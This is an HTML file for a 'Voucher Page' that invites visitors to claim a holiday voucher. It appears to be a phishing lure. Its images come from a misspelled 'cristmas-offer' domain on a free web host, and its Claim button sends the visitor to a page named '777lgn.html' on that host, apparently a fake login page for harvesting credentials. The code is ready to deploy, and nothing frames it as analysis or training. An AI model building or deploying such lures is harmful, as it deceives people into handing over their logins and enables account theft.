new offer
8 months ago in HTML
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
body {
margin: 0;
padding: 0;
font-family: Arial, sans-serif;
background-color: rgb(6, 21, 42);
color: white;
}
.container {
display: flex;
flex-direction: column;
align-items: center;
justify-content: center;
}
.logo {
text-align: center;
padding-top: 110px;
padding-bottom: 10px;
}
.logo img {
max-width: 100%;
height: auto;
}
.vimg img {
max-width: 90%;
height: auto;
}
.voucher-info {
text-align: center;
margin-top: 10px;
}
.amount {
font-size: 64px;
font-weight: bold;
color: #ffcc23;
}
.claim-text {
font-size: 26px;
margin-top: 5px;
}
.claim-button {
width: 200px;
height: 45px;
margin-top: 20px;
padding: 10px 20px;
background-color: rgb(255, 93, 44) !important;
color: #ffffff;
border: none;
border-radius: 5px;
cursor: pointer;
font-size: 16px;
}
</style>
<title>Voucher Page</title>
</head>
<body>
<div class="container">
<div class="logo">
<img src="https://cristmas-offer.000webhostapp.com/images/w9z1wleyv33Y.png" alt="Logo">
</div>
<div class="voucher-info">
<div class="vimg">
<img src="https://cristmas-offer.000webhostapp.com/images/Z9QEURzxJKKI.png" alt="Logo">
</div>
<p class="claim-text">Claim your voucher</p>
</div>
<button id="claimButton" class="claim-button">Claim</button>
</div>
<script>
var claimButton = document.getElementById("claimButton");
claimButton.addEventListener("click", function() {
window.location.href = "https://cristmas-offer.000webhostapp.com/777lgn.html";
});
</script>
</body>
</html>